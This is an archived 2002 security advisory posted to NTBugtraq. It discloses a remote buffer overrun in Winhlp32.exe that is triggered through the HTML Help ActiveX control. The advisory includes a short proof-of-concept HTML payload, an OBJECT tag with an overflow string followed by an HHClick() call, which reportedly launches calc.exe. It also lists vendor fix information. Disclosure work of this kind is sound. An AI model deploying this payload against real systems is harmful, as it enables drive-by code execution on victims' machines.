Winhlp32.exe Remote BufferOverrun

From: Next Generation Insight Security Research Team (mark@NGSSOFTWARE.COM)
Date: 08/02/02


Date:         Thu, 1 Aug 2002 19:41:08 -0700
From: Next Generation Insight Security Research Team <mark@NGSSOFTWARE.COM>
To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

NGSSoftware Insight Security Research Advisory

Name: Winhlp32.exe Remote BufferOverrun
Systems Affected: Win2K Platform
Severity: Critical
Category: Remote Buffer Overrun
Vendor URL: http://www.mircosoft.com
Author: Mark Litchfield (mark@ngssoftware.com)
Date: 1st August 2002
Advisory number: #NISR01082002

Description
***********

Many of the features available in HTML Help are implemented through the HTML
Help ActiveX control (HHCtrl.ocx). The HTML Help ActiveX control is used to
provide navigation features (such as a table of contents), to display
secondary windows and pop-up definitions, and to provide other features. The
HTML Help ActiveX control can be used from topics in a compiled Help system
as well as from HTML pages displayed in a Web browser. The functionality
provided by the HTML Help ActiveX control will run in the HTML Help Viewer
or in any browser that supports ActiveX technology, such as Internet
Explorer (version 3.01 or later). Some features, as with the WinHlp Command,
provided by the HTML Help ActiveX control are meant to be available only
when it is used from a compiled HTML Help file (.chm) that is displayed by
using the HTML Help Viewer.

Details
*******

Winhlp32.exe is vulnerable to a bufferoverrun attack using the Item
parameter within WinHlp Command, the item parameter is used to specify the
file path of the WinHelp (.hlp) file in which the WinHelp topic is stored,
and the window name of the target window. Using this overrun, an attacker
can successfully exectute arbitary code on a remote system by either
encouraging the victim to visit a particular web page, whereby code would
execute automatically, or by including the exploit within the source of an
email. In regards to email, execution would automatically occur when the
mail appears in the preview pane and ActiveX objects are allowed (This is
allowed by default, the Internet Security Settings would have to be set as
HIGH to prevent execution of this vulnerability). Any exploit would execute
in the context of the logged on user.

Visual POC Exploit
******************

<OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11
codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp
type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM
NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM
NAME="Item1"
VALUE="3Phcalc4$&#402;&#1;PVw3P&#8221;wAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTT
AAAA&#11;wABCDEFGH&#402;&#21;gMyWindow"><PARAM NAME="Item2" VALUE="NGS
Software LTD"></OBJECT>
<SCRIPT>winhelp.HHClick()</SCRIPT>

Fix Information
***************

NGSSoftware alerted Microsoft to these problems on the 6th March 2002.
NGSSoftware highly recommend installing Microsoft Windows SP3, as the fix
has been built into this service pack found at http://www.microsoft.com
An alternative to these patches would be to ensure the security settings
found in the Internet Options is set to high. Despite the Medium setting,
stating that unsigned ActiveX controls will not be downloaded, Kylie will
still execute Calc.exe. Another alternative would be to remove winhlp32.exe
if it is not required within your environment.
A check for these issues has been added to Typhon II, of which more
information is available from the
NGSSoftware website, http://www.ngssoftware.com.

Further Information
*******************

For further information about the scope and effects of buffer overflows,
please see

http://www.ngssoftware.com/papers/non-stack-bo-windows.pdf
http://www.ngssoftware.com/papers/ntbufferoverflow.html
http://www.ngssoftware.com/papers/bufferoverflowpaper.rtf
http://www.ngssoftware.com/papers/unicodebo.pdf



Relevant Pages

  • Winhelp32 Remote Buffer Overrun
    ... Many of the features available in HTML Help are implemented through ... the HTML Help ActiveX control. ...
    (Bugtraq)
  • RE: Winhelp32 Remote Buffer Overrun
    ... > Subject: Re: Winhelp32 Remote Buffer Overrun ... The HTML Help ActiveX control ... >>> Help ActiveX control will run in the HTML Help Viewer or in any ... >>> execute in the context of the logged on user. ...
    (Bugtraq)
  • Re: Winhelp32 Remote Buffer Overrun
    ... > the HTML Help ActiveX control. ... > execute in the context of the logged on user. ...
    (Bugtraq)
  • Re: Winhelp32 Remote Buffer Overrun
    ... > notified microsoft of this several months ago. ... >> the HTML Help ActiveX control. ...
    (Bugtraq)
  • Re: HTML Help links broken
    ... This won't work, unfortunately, because the HTML Help runtime ... components are protected system components in Windows 2000 and later. ... unregistering and then re-registering the HTML Help ActiveX control by ... opening a Command Prompt window and entering these two commands: ...
    (microsoft.public.windowsxp.general)